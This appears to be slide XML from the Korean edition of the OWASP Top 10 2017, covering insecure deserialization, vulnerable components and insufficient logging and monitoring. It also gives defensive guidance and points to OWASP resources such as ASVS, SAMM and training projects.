                        <a:t>업계 설문조사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기반으로 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Top 10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항목에 포함되었습니다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 툴로 역직렬화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취약점을 발견할 수 있지만 문제를 입증하기 위해선 빈번히 사람의 도움이 필요합니다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관련 분포 데이터가 늘어나 역직렬화 취약점을 식별하고 해결하는데 도움을 주는 툴이 개발될 것으로 예상됩니다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역직렬화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취약점의 영향을 간과해서는 안됩니다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 취약점으로 인해 가장 심각한 공격 중 하나인 원격코드 실행 공격이 발생할 수 있습니다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비즈니스에 미치는 영향은 애플리케이션과 데이터 보호의 필요성에 따라 달라질 수 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E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3" name="Shape 373"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25323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/>
              <a:t>위협요소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-31934" y="76199"/>
            <a:ext cx="1386600" cy="814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A8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40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:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Shape 375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/>
              <a:t>공격요인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Shape 376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 dirty="0" err="1"/>
              <a:t>보안</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1"/>
              <a:t>취약점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Shape 377"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5579974" y="1151864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 dirty="0" err="1"/>
              <a:t>영향</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Shape 379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비즈니스?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 303">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90E48932-EF88-4860-82FA-35659F2C6C5B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46776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 시나리오 예제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9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#1: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일반적으로 구성요소는 애플리케이션 자체와 동일한 권한으로 실행되므로 구성요소의 결함으로 인해 심각한 영향을 받을 수 있습니다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이러한 결함은 실수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코딩 오류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또는 고의적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구성 요소 내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백도어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일 수 있습니다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발견된 악용 가능한 구성요소의 취약점의 예는 다음과 같습니다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4"/>
              </a:rPr>
              <a:t>CVE-2017-5638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서버 상에서 임의 코드 실행을 가능케 했던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스트럿츠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원격코드 실행 취약점이 심각한 보안 사고로 인해 비난 받았습니다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5"/>
              </a:rPr>
              <a:t>사물 인터넷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5"/>
              </a:rPr>
              <a:t>(IoT)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은 종종 패치하기 어렵거나 불가능하지만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패치를 적용하는 것이 중요할 수 있습니다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생체 의료 장비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공격자가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패치되지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않았거나 잘못 구성된 시스템을 찾는데 도움이 되는 자동화된 도구들이 있습니다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예를 들면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Shodan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IoT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검색 엔진은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2014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년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월에 패치된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6"/>
              </a:rPr>
              <a:t>하트블리드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6"/>
              </a:rPr>
              <a:t> 취약점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에 여전히 취약한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7"/>
              </a:rPr>
              <a:t>디바이스들을 찾는데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도움을 줄 수 있습니다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dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="900" u="sng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취약점 확인 방법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클라이언트와 서버 측면의 양쪽에서 사용하는 모든 구성 요소의 버전을 알지 못한다면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여기에는 직접 사용하는 구성 요소와 중첩된 종속성이 포함됩니다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소프트웨어가 취약하거나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지원되지 않거나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오래된 버전인 경우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여기에는 운영체제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웹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/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애플리케이션 서버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데이터베이스 관리 시스템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(DBMS),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애플리케이션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API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 모든 구성요소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런타임 환경과 라이브러리 등이 포함됩니다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AU" sz="88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정기적으로 취약점을 스캔하지 않거나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사용 중인 컴포넌트와 관련된 보안 취약점 공지 서비스에 등록하지 않은 경우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위험 기반으로 적절한 시기에 플랫폼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프레임워크와 종속성을 수정하거나 업그레이드하지 않은 경우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이는 패치 적용이 변경 통제 하에서 매월 또는 분기별 작업하는 환경에서 일반적으로 발생합니다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이로 인해 조직은 며칠 또는 몇 달 동안 수정된 취약점에 불필요하게 노출될 수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AU" sz="88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소프트웨어 개발자가 업데이트된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업그레이드된 혹은 패치된 라이브러리의 호환성을 테스트하지 않는다면 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구성요소의 구성 정보를 보호하지 않는다면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취약할 가능성이 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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AU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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="88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8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A6:2017-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="88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8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>잘못된 보안 구성</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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을 보십시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="88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).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:b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참조문서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8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OWASP </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8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9"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard: V1 Architecture, design and threat modelling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0"/>
              </a:rPr>
              <a:t>OWASP Dependency Check (for Java and .NET libraries)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1"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Map Application Architecture (OTG-INFO-010)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2"/>
              </a:rPr>
              <a:t>OWASP Virtual Patching Best Practices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외부자료</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1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3"/>
              </a:rPr>
              <a:t>The Unfortunate Reality of Insecure Libraries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4"/>
              </a:rPr>
              <a:t>MITRE Common Vulnerabilities and Exposures (CVE) search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National Vulnerability Database (NVD)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6"/>
              </a:rPr>
              <a:t>Retire.js for detecting known vulnerable JavaScript libraries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7"/>
              </a:rPr>
              <a:t>Node Libraries Security Advisories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8"/>
              </a:rPr>
              <a:t>Ruby Libraries Security Advisory Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>and Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"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패치 관리 프로세스가 있어야만 합니다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사용하지 않는 종속성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불필요한 기능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구성 요소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파일과 문서 등을 제거하십시오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9"/>
              </a:rPr>
              <a:t>versions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 </a:t>
            </a:r>
            <a:r>
              <a:rPr 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0"/>
              </a:rPr>
              <a:t>DependencyCheck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6"/>
              </a:rPr>
              <a:t>retire.js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 같은 도구를 사용하여 클라이언트 및 서버 측의 구성 요소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프레임워크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라이브러리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 해당 종속성의 버전을 지속적으로 관리합니다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20"/>
              </a:rPr>
              <a:t>CVE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NVD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로부터 구성요소 내 취약점을 지속적으로 모니터링합니다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소프트웨어 구성 분석 도구를 사용하여 프로세스를 자동화 하십시오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사용하는 구성요소와 관련된 보안 취약점에 대한 전자메일 알림을 구독하십시오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latin typeface="+mn-ea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안전한 링크를 통해 공식적인 출처로부터 구성 요소를 획득하십시오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조작되거나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악의적인 구성 요소가 포함될 가능성을 줄이기 위해 서명된 패키지를 사용하십시오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유지 관리되지 않거나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이전 버전의 보안 패치를 만들지 않는 라이브러리 및 구성 요소를 모니터링합니다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패치가 불가능한 경우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발견된 문제를 모니터링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탐지 혹은 보호하기 위해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21"/>
              </a:rPr>
              <a:t>가상 패치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를 배포하는 것을 고려하십시오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모든 조직은 애플리케이션 혹은 포트폴리오의 수명 주기 동안 업데이트 또는 구성 변경을 모니터링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검토 및 적용하기 위한 지속적인 계획이 있는지를 확실히 해야만 합니다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br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:b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A9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</a:rPr>
              <a:t>알려진 취약점이 있는 구성 요소 사용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mj-ea"/>
            </a:endParaRP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0618"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="21024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de" sz="120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0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0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol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많은 알려진 취약점에 대해 이미 작성된 공격 코드를 쉽게 찾을 수 있지만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다른 취약점은 개별 공격 코드를 개발하기 위한 집중적인 노력이 요구됩니다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문제에 대한 확산은 매우 광범위합니다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구성 요소가 많은 개발 패턴은 개발팀이 애플리케이션이나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API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사용하는 구성 요소들을 이해하지 못해 최신 상태로 유지하는데 어려움을 겪습니다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retire.js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같은 일부 스캐너는 탐지를 돕지만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악용 가능성을 결정하는 데에는 추가적인 노력이 필요합니다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일부 알려진 취약점들은 단지 사소한 영향을 미치지만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현재까지 발생한 가장 큰 유출 사고들 중 일부는 구성 요소 내의 알려진 취약점을 악용한 것이었습니다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보호하려는 자산에 따라 이 위험은 목록의 상단에 있어야만 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0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1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2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4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42C821B1-5B02-4192-98E4-88EE49C0C488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35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 시나리오 예제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#1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소규모 팀이 운영하는 오픈소스 프로젝트 포럼 소프트웨어는 그 소프트웨어 내 결함이 악용되어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해킹당했습니다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공격자는 다음 버전과 모든 포럼 내용이 포함된 내부 소스코드 저장소를 삭제했습니다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소스코드를 복구할 수 있었지만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모니터링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로깅 혹은 경고의 부재는 훨씬 더 큰 불이익을 초래했습니다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문제로 인해 포럼 소프트웨어 프로젝트가 더 이상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활성되지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않았습니다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#2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공격자는 공통 암호를 사용하는 사용자를 찾기 위해 스캔을 합니다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암호를 사용하여 모든 계정을 탈취할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다른 모든 사용자의 경우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이 스캔은 단지 하나의 잘못된 로그인 기록만을 남깁니다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며칠 후 다른 비밀번호로 이 작업을 반복할 수 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dirty="0">
              <a:latin typeface="+mn-ea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시나리오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#3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미국의 한 주요 소매 업체는 첨부 파일을 분석하는 내부 악성코드 분석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샌드박스를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갖고 있었습니다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샌드박스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소프트웨어는 잠재적으로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원치않은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소프트웨어를 탐지했지만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아무도 이 탐지에 대응하지 않았습니다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샌드박스는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외부 은행에 의한 사기성 카드 거래로 인해 그 보안사고가 탐지되기 전까지 얼마 동안 경고를 표시했습니다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dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill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취약점 확인 방법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불충분한 로깅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탐지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모니터링과 유효한 응답은 언제나 발생합니다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로그인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로그인 실패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그리고 높은 가치를 가진 트랜잭션들과 같은 감사해야 할 이벤트들이 기록되지 않습니다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경고 및 오류에 대해 로그 메시지가 없거나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불충분하거나 불명확합니다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의심스러운 활동에 대해 애플리케이션과 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의 로그를 모니터링하지 않습니다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로그를 단지 로컬에만 저장합니다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적절한 경고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임계값과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응답 에스컬레이션 프로세스가 적절하지 않거나 효과적이지 않습니다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+mn-ea"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DAST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도구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5"/>
              </a:rPr>
              <a:t>OWASP ZAP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를 통한 침투 테스트 및 검사는 경고들을 추적하지 않습니다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애플리케이션은 실시간 혹은 거의 실시간으로 유효한 공격을 탐지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에스컬레이션 또는 경고할 수 없습니다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사용자나 공격자에게 로깅이나 경고 이벤트가 보여질 수 있다면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정보 유출에 취약합니다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(</a:t>
            </a:r>
            <a:r>
              <a:rPr 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6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A3:2017-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="9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  <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>민감한 데이터 노출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을 보십시오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참조문서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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8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7"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Implement Logging and Intrusion Detection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8"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard: V8 Logging and Monitoring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8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Detailed Error Code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9"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Logging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ct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800" b="1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외부자료</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea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1"/>
              </a:rPr>
              <a:t>CWE-223: Omission of Security-relevant Information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2"/>
              </a:rPr>
              <a:t>CWE-778: Insufficient Logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:b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900" u="sng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보안 대책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1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애플리케이션에 의해 저장되거나 처리되는 데이터의 위험에 따라</a:t>
            </a:r>
            <a:r>
              <a:rPr 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모든 로그인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접근 통제 실패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그리고 서버 측면의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1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입력값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 검증 실패 등이 의심스럽거나 악의적인 계정을 식별할 수 있는 충분한 사용자 문맥으로 기록될 수 있는지 확실히 하십시오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그리고 지연된 포렌식 분석을 허용할 수 있는 충분한 시간을 확보하십시오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</a:rPr>
              <a:t>중앙 집중적 로그 관리 솔루션에 의해 쉽게 사용될 수 있는 형식으로 로그가 생성되는지 확실히 하십시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="9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</a:rPr>
              <a:t>부가 가치가 높은 거래에는 단지 추가만 가능한 데이터베이스 테이블 혹은 유사한 것과 같은 변조나 삭제를 방지하기 위한 무결성 통제 기능을 갖춘 감사 추적 기능을 확실히 하십시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea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의심스러운 활동이 적시에 탐지되고 대응될 수 있도록 효과적인 모니터링 및 경고를 설정하십시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2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3"/>
              </a:rPr>
              <a:t>NIST 800-61 rev 2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 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이상과 같은 사고 대응 및 복구 계획을 수립하거나 채택하십시오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4"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr 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4"/>
              </a:rPr>
              <a:t>AppSensor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 같은 상용 혹은 오픈소스 애플리케이션 보호 프레임워크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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr 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ModSecurity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핵심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룰셋을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 가진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  <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>ModSecurity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와 같은 웹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어프리케이션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방화벽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, </a:t>
            </a:r>
            <a:r>
              <a:rPr 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그리고 개별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대쉬보드와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 경고를 갖는 로그 상관분석 소프트웨어가 있습니다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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill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n-US" sz="3600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>A10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800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불충분한 로깅 및 모니터링</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-ea"/>
            </a:endParaRP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59648"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="21024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de" sz="100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de" sz="120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0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de" sz="100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1200" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol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기술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de" sz="120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en-US" sz="11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불충분한 로깅과 모니터링에 대한 공격은 거의 모든 중요한 보안사고의 기반이 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공격자는 탐지됨 없이 부족한 모니터링과 부적절한 대응에 의존하여 목표를 성취합니다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문제는</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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16"/>
                        </a:rPr>
                        <a:t>업계 설문조사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기반으로 상위 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항목에 포함됩니다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충분한 모니터링을 하고 있는지 판단하기 위한 하나의 전략은 침투 테스트 후 로그를 검사하는 것입니다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테스터의 행동은 어떤 피해를 입었는지 이해할 수 있도록 충분히 기록되어야 합니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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가장 성공적인 공격은 취약성 탐색부터 시작합니다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이러한 탐색을 계속하다 보면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 성공율을 거의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100%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까지 높일 수 있습니다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년에 보안 사고를 식별하는데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hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>평균 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hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>191</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" alt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hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>일</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" alt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이 걸렸습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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피해를 입힐 시간은 충분했습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="90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0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11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12" name="Shape 327"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2315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14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15" name="Shape 303">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82C2D985-6387-47E2-A5D3-DEE8AC4784A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2315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4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8024"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="81468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반복적인 보안 프로세스와 표준 보안 통제 사용 및 구축하십시오</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD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여러분들이 웹 애플리케이션 보안 분야에 처음이거나 이미 이러한 위협을 잘 알고 있어도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안전한 웹 애플리케이션을 개발하거나 기존 애플리케이션을 보완하는 작업은 어려울 수 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만약에 관리할 애플리케이션 목록이 많다면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더욱 벅찰 수 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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조직과 개발자들이 비용 측면에서 효과적으로 애플리케이션 보안 위협을 줄이는 데 도움이 되고자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여러분의 조직에서 직접 애플리케이션 보안 문제를 다루는 데 사용할 수 있는 수많은 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="9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무료 공개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자료들을 제공해왔습니다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아래는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 조직 내에서 보안 웹 애플리케이션과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개발하는 데 있어서 도움을 주기 위해 제공한 많은 자료 중 일부입니다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조직에서 각종 애플리케이션과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보안을 검증하는 데 보탬이 될 만한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자료들은 다음 페이지에서 추가로 소개하겠습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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여러분이 사용할 수 있는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추가 자료들이 많습니다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OWASP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목록 내 모든 플래그십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인큐베이터 프로젝트가 실려있는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hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP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hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>프로젝트 페이지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방문하십시오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대다수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자료들은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hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>wiki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구할 수 있으며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많은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OWASP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문서들은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hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>하드카피 또는 전자책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으로 주문할 수 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="90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914400" y="2895600"/>
            <a:ext cx="8763000" cy="5029200"/>
            <a:chOff x="-914400" y="2895600"/>
            <a:chExt cx="8763000" cy="5029200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-914400" y="2895600"/>
              <a:ext cx="8763000" cy="5029200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="2932906"/>
              <a:ext cx="5608321" cy="910621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안전한 웹 애플리케이션을 개발하려면 해당 애플리케이션이 안전하다는 게 무엇인지 정의해야 합니다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OWASP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는 여러분의 애플리케이션에 보안 요구사항을 설정하기 위한 지침서로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7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7"/>
                </a:rPr>
                <a:t>애플리케이션 보안 검증 표준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7"/>
                </a:rPr>
                <a:t>(ASVS)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을 사용하기를 권장합니다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만약에 아웃소싱을 하고 있다면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8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8"/>
                </a:rPr>
                <a:t>안전한 소프트웨어 계약 부록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을 고려하십시오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주의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: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해당 부록은 미국 계약법을 위한 것이므로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샘플 부록을 사용하기 전에 자격을 갖춘 전문가에게 법률 자문을 구하십시오</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>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192845" y="2932907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33034" y="3964713"/>
              <a:ext cx="5608321" cy="87354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기존 애플리케이션과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API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에 보안 요소를 추가하는 것보다 초기 개발 시 보안을 고려해서 설계하는 것이 비용 대비 효율적입니다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OWASP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는 처음부터 보안 설계를 하는 방법 지침서에 대한 좋은 출발점으로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9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9"/>
                </a:rPr>
                <a:t>보호 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1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9"/>
                </a:rPr>
                <a:t>치트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9"/>
                </a:rPr>
                <a:t> 시트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를 권장합니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>. 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92845" y="3942369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애플리케이션 보안</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" altLang="ko-KR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</a:b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아키텍처</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0"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33034" y="4959441"/>
              <a:ext cx="5608321" cy="89343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강력하고 사용하기 편리한 보안 통제를 구축하는 것은 어렵습니다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표준 보안 통제를 사용하면 안전한 애플리케이션과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API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개발을 굉장히 단순화합니다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0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0"/>
                </a:rPr>
                <a:t>선제적 통제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는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개발자를 위한 좋은 출발점으로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많은 세련된 프레임워크는 권한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유효성 검증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CSRF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예방 등에 대해 효과적인 표준 보안 제어가 포함되어 있습니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"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92845" y="4962145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표준</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" dirty="0">
                  <a:latin typeface="+mj-ea"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a: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보안</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" altLang="ko-KR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</a:b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통제</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0"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33034" y="5973834"/>
              <a:ext cx="5608321" cy="901740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OWASP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는 여러분의 조직이 애플리케이션과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API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개발 시 따르는 프로세스를 개선할 때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1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1"/>
                </a:rPr>
                <a:t>소프트웨어 보증 성숙도 모델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1"/>
                </a:rPr>
                <a:t>(SAMM)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를 권장합니다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이 모델은 조직이 직면한 특정 위협에 알맞은 소프트웨어 보안 전략을 수립하고 구현하는 데 도움을 줍니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>. 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92845" y="5979462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33034" y="6991151"/>
              <a:ext cx="5608321" cy="926002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2"/>
                </a:rPr>
                <a:t>OWASP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2"/>
                </a:rPr>
                <a:t>교육 프로젝트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는 개발자에게 웹 애플리케이션 보안을 교육하는 데 도움을 주기 위해 실습 자료를 제공합니다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취약점에 대한 체험 학습을 하려면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3"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1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3"/>
                </a:rPr>
                <a:t>WebGoat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4"/>
                </a:rPr>
                <a:t>WebGoat.NET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5"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1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5"/>
                </a:rPr>
                <a:t>NodeJS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5"/>
                </a:rPr>
                <a:t> Goat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6"/>
                </a:rPr>
                <a:t>OWASP Juice Shop Project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또는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7"/>
                </a:rPr>
                <a:t>OWASP Broken Web Applications Project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를 사용해 보십시오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.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최신 동향을 파악하려면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8"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1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8"/>
                </a:rPr>
                <a:t>AppSec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8"/>
                </a:rPr>
                <a:t> Conference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, OWASP Conference Training, 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또는 지역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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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  <a:hlinkClick r:id="rId19"/>
                </a:rPr>
                <a:t>OWASP Chapter meetings</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="9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+mn-ea"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>에 참가해 보십시오</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>. 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92845" y="6996761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b="1" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="+mj-ea"/>
